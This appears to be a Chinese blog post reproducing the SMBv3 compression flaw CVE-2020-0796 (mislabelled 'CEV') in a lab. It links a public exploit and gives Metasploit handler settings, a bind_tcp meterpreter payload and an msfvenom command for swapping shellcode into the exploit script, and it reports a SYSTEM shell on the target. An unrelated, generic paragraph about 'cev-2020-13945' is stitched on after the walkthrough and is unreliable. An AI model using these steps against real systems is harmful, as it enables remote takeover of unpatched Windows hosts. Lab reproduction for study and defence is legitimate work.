CEV-2020-0796复现

本文详细解析了SMBv3协议中的一个关键漏洞,该漏洞允许远程未认证攻击者执行任意代码。影响多个Windows10及Server版本。文章提供了复现环境配置、步骤及利用代码示例。

一、漏洞原理
该漏洞是由于SMBv3协议在处理恶意的压缩数据包时出错所造成的,它可让远程且未经身份验证的攻击者在目标系统上执行任意代码。
二、影响版本
适用于32位系统的Windows 10版本1903
Windows 10 1903版(用于基于x64的系统)
Windows 10 1903版(用于基于ARM64的系统)
Windows Server 1903版(服务器核心安装)
适用于32位系统的Windows 10版本1909
Windows 10版本1909(用于基于x64的系统)
Windows 10 1909版(用于基于ARM64的系统)
Windows Server版本1909(服务器核心安装)
三、复现环境
靶机:win10_1903 IP:192.168.123.47
攻击机:kali IP:192.168.123.30

exp:https://github.com/dacade/CVE-POC/tree/master/CVE-2020-0796

四、复现过程
先在kali里开msf监听(exp后shell会反弹到监听窗口)
这里我们使用模块

use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp

然后把对应参数设置好就行了
在这里插入图片描述
需要注意的是,我们使用的监听端口是3333,这是因为POC里指定的port是3333,如果要使用别的端口,可以用msf生成其他端口的shellcode。

msfvenom -p windows/x64/meterpreter/bind_tcp lport=4444 -f py -o shellcode.txt

然后将生成的shellcode替换exp中的exploit.py中的USER_PAYLOAD即可。
在开了监听后,可以直接执行POC了
在这里插入图片描述
然后任意按键就能退出exp,然后回到监听窗口就能拿到shell
在这里插入图片描述
而且直接就是system权限
在这里插入图片描述

cev-2020-13945是一个网络安全漏洞,其原理可以简单地总结为输入验证不充分导致的代码注入。具体来说,该漏洞出现在某个软件系统的用户输入验证过程中,攻击者可以通过特殊构造的输入数据绕过系统的输入检查,并将恶意代码注入系统中执行。 一般来说,在软件系统中,应该对用户的输入进行严格的验证,以确保输入数据的合法性和安全性。然而,cev-2020-13945漏洞中,该验证过程存在缺陷,未对用户输入进行充分检查,导致攻击者可以利用这个漏洞来注入恶意代码。 攻击者可以利用该漏洞通过一些特殊的输入数据,如恶意的SQL语句或脚本代码,来绕过系统的输入检查。当系统接受并执行这些恶意代码时,可能会导致数据泄露、系统崩溃、远程代码执行等安全问题。 为了防止cev-2020-13945漏洞的利用,软件开发者需要加强对用户输入的验证和过滤。例如,可以使用白名单验证的方法,只接受特定格式和类型的输入数据。此外,还可以使用特定的编程语言和框架提供的安全函数,如参数化查询、输出编码等,来避免代码注入的风险。 总之,cev-2020-13945漏洞是由于输入验证不充分导致的代码注入问题。要修复该漏洞,软件开发者需要改进输入验证的代码,确保用户输入的安全性和合法性。同时,用户也需要保持软件系统的及时更新,以免受到这类安全漏洞的威胁。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值